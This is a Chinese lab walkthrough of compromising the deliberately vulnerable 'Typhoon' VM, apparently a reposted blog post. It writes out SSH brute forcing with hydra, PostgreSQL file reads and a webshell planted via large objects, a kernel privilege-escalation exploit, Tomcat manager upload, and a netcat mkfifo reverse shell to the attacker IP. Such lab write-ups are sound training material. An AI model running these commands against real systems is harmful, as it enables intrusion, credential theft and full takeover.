Typhoon靶机渗透测试

栏目: 编程工具 · 发布时间: 5年前

内容简介:Typhoon这台靶机有比较多的漏洞,最多的就是由于配置不当导致漏洞。Typhoon靶机下载地址:

Typhoon靶机渗透测试

前言

Typhoon这台靶机有比较多的漏洞,最多的就是由于配置不当导致漏洞。

靶机下载及配置

Typhoon靶机下载地址: https://pan.baidu.com/s/18U0xwa9ukhYD4XyXJ98SlQ 提取码: jbn9

Typhoon靶机ip: 192.168.56.150

kali攻击者ip: 192.168.56.1

知识点

nmap

dirb

hydra

msfvenom

内核权限提升

Tomcat manger

Durpal cms

Lotus cms

Mongodb

postgresql未经授权访问

redis未经授权访问

……

开始测试

第一步还是开始进行目标靶机网络端口信息收集

nmap -sV -p- -A 192.168.56.150

Typhoon靶机渗透测试

Typhoon靶机渗透测试

Typhoon靶机渗透测试

Typhoon靶机渗透测试

扫描之后发现目标开放了很多的端口比如 21(ftp),22(ssh),25(smtp),53(dns),80(http),…2049(nfs-acl),3306(mysql),5432(postgresql),6379(redis),8080(http),27017(mongodb)等。

竟然发现开放了这么多端口,首先就得一个一个端口去测试(测试一部分)。

21端口(ftp)

nmap扫描结果为可以匿名访问

在浏览器访问,发现什么都没有

Typhoon靶机渗透测试

22端口(ssh)

首先开始是想什么呢,ssh连接需要账号密码的,发现靶机名字为typhoon就想着去测试一下看看账号存不存在,利用ssh用户枚举漏洞进行测试

Typhoon靶机渗透测试

结果用户存在,于是去想着爆破一下密码,看看是否为弱密码。

使用工具hydra

hydra -l typhoon -P /usr/share/wordlist/metasploit/unix_passwords.txt ssh://192.168.56.150

Typhoon靶机渗透测试

得到账号密码

username: typhoon

password: 789456123

登录测试

Typhoon靶机渗透测试

25端口(smtp)

在测试时没有测试成功

nc 192.168.56.150 25

Typhoon靶机渗透测试

111端口(nfs,rpcbind)

Typhoon靶机渗透测试

5432端口(postgresql)

第一步msf模块测试一下

use auxiliary/scanner/postgres/postgres_login

set rhosts 192.168.56.150

exploit

Typhoon靶机渗透测试

发现账号密码

username: postgres

password: postgres

登录数据库

psql -h 192.168.56.150 -U postgres

列下目录

select pg_ls_dir('./');

Typhoon靶机渗透测试

读取权限允许的文件

select pg_read_file('postgresql.conf',0,1000);

建表,并使用copy从文件写入数据到表

DROP TABLE if EXISTS MrLee;
CREATE TABLE MrLee(t TEXT);
COPY MrLee FROM '/etc/passwd';
SELECT * FROM MrLee limit 1 offset 0;

成功读取到了/etc/passwd第一行

Typhoon靶机渗透测试

直接读出全部数据

SELECT * FROM MrLee;

Typhoon靶机渗透测试

Typhoon靶机渗透测试

利用数据库写文件

INSERT INTO MrLee(t) VALUES ('hello,MrLee');
COPY MrLee(t) TO '/tmp/MrLee';

Typhoon靶机渗透测试

SELECT * FROM MrLee;

会显示里面有一句hello,MrLee

如上可见,文件可以成功写入,并成功读取到源内容。

接下来就可以利用 “大对象” 数据写入法

SELECT lo_create(6666);
delete from pg_largeobject where loid=6666;
//创建OID,清空内容

Typhoon靶机渗透测试

接下来向”大对象”数据写入数据(木马),使用hex:

在写数据之前,先生成一个木马

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.56.1 LPORT=6666 R > /Desktop/shell.php

Typhoon靶机渗透测试

打开这个shell.php复制转换成16进制

Typhoon靶机渗透测试

insert into pg_largeobject (loid,pageno,data) values(6666, 0, decode('.....', 'hex'));

Typhoon靶机渗透测试

导出数据到指定文件:

SELECT lo_export(6666, '/var/www/html/shell.php');
//默认导出到安装根目录 也可以带路径自由目录写shell

Typhoon靶机渗透测试

接下来就是访问了(先msf开启监听,然后 http://192.168.56.150/shell.php )

Typhoon靶机渗透测试

6379端口(redis)

Redis未经授权访问漏洞利用,连接redis

Typhoon靶机渗透测试

这个漏洞有三种方法利用

1.利用 redis 写webshell

2.利用”公私钥”认证获取root权限

3.利用crontab反弹shell

这三种方法都能可以,但就是利用不了,在这个点我弄了很多遍,决定放弃但在最后发现我写的文件都存在靶机里,原因是那些文件都没有更高的执行权限,所以导致都导致利用不了。

参考链接

其他端口

未完待续

80端口(http)

访问80端口 http://192.168.56.150

Typhoon靶机渗透测试

在nmap扫描发现80端口有个/monoadmin/目录,访问 http://192.168.56.150/monoadmin

Typhoon靶机渗透测试

选择84mb,点击change database,打开之后出现下面界面

Typhoon靶机渗透测试

然后下面有两个链接点击creds,会发现一个账号密码,跟ssh爆破一样的。

Typhoon靶机渗透测试

username: typhoon

password: 789456123

再次使用ssh连接

ssh typhoon@192.168.56.150

Typhoon靶机渗透测试

竟然再次让我连接上了,这次我就不会这么轻易的放过它了,就想着看看能不能进行提权,于是查看了一下系统信息,不过连接的时候也告诉了系统的信息了

Typhoon靶机渗透测试

发现目标为ubuntu 14.04,去 exploit-db 搜索这个内核漏洞,然后下载

poc地址: https://www.exploit-db.com/exploits/37292

Typhoon靶机渗透测试

下载之后是一个.c文件,需要编译,把它上传到靶机编译运行

scp /Downloads/37292.c typhoon@192.168.56.150:/home/typhoon/

Typhoon靶机渗透测试

上传之后看一下成功了没,然后编译并运行

ls
gcc 37292.c -o 37292
ls
./37292

成功提权

Typhoon靶机渗透测试

8080端口(Tomcat)

浏览器访问 http://192.168.56.150:8080

Typhoon靶机渗透测试

发现需要登录

Typhoon靶机渗透测试

于是想用msf测试存在账号密码

Typhoon靶机渗透测试

Typhoon靶机渗透测试

等到账号密码

username: tomcat

password: tomcat

利用mgr_upload漏洞

Typhoon靶机渗透测试

python -c 'import pty;pty.spawn("/bin/bash")' 进行交互

最后再tab文件里发现一个.sh文件具有高的执行权限,就想着往里面写代码进行再次提权.

Typhoon靶机渗透测试

这时需要msfvenom创建bash代码

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.56.1 lport=5555 R

Typhoon靶机渗透测试

将生成的恶意代码添加到script.sh文件中

echo "mkfifo /tmp/qadshdh; nc 192.168.56.1 5555 0</tmp/qadshdh | /bin/sh >/tmp/qadshdh 2>&1; rm /tmp/qadshdh" > script.sh

运行./script.sh之前开启监听

Typhoon靶机渗透测试

开启监听端口

nc -lvp 5555

Typhoon靶机渗透测试

dirb 扫描

在dirb扫描中有cms,durpal,phpmyadmin等

Typhoon靶机渗透测试

Lotus CMS

访问cms: http://192.168.56.150/cms

Typhoon靶机渗透测试

Typhoon靶机渗透测试

利用msf的lotus cms模块

Typhoon靶机渗透测试

Typhoon靶机渗透测试

Drupal CMS

访问drupal: http://192.168.56.150/drupal

Typhoon靶机渗透测试

再次使用msf的durpal cms模块

Typhoon靶机渗透测试

在dvwa文件的config配置文件中发现了phpmyadmin数据库的账号密码了

Typhoon靶机渗透测试

username: root

password: toor

访问登录: http://192.168.56.150/phpmyadmin

Typhoon靶机渗透测试

进去之后发现得到一些账号密码,结果发现是在靶机了搭建了两个web测试平台

Typhoon靶机渗透测试

Typhoon靶机渗透测试

总结

本次靶机主要是端口渗透,类似于metasploitable2靶机,漏洞产生原因是由于配置不当。又学到了一些思路,哈哈哈。继续努力


以上所述就是小编给大家介绍的《Typhoon靶机渗透测试》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

决战大数据

决战大数据

车品觉 / 浙江人民出版社 / 2014-3-1 / 45.9

[内容简介]  大数据时代的来临,给当今的商业带来了极大的冲击,多数电商人无不“谈大数据色变”,并呈现出一种观望、迷茫、手足无措的状态。车品觉,作为一名经验丰富的电商人,在敬畏大数据的同时,洞悉到了数据时代商业发展的更多契机,他创新了数据框架的建立和使用,重新量化了数据价值的指标,并挖掘了在无线数据和多屏时代下商业发展的本质……在他看来,改变思维方式,即可改变数据和商业的未来。  ......一起来看看 《决战大数据》 这本书的介绍吧!

RGB转16进制工具
RGB转16进制工具

RGB HEX 互转工具

HEX HSV 转换工具
HEX HSV 转换工具

HEX HSV 互换工具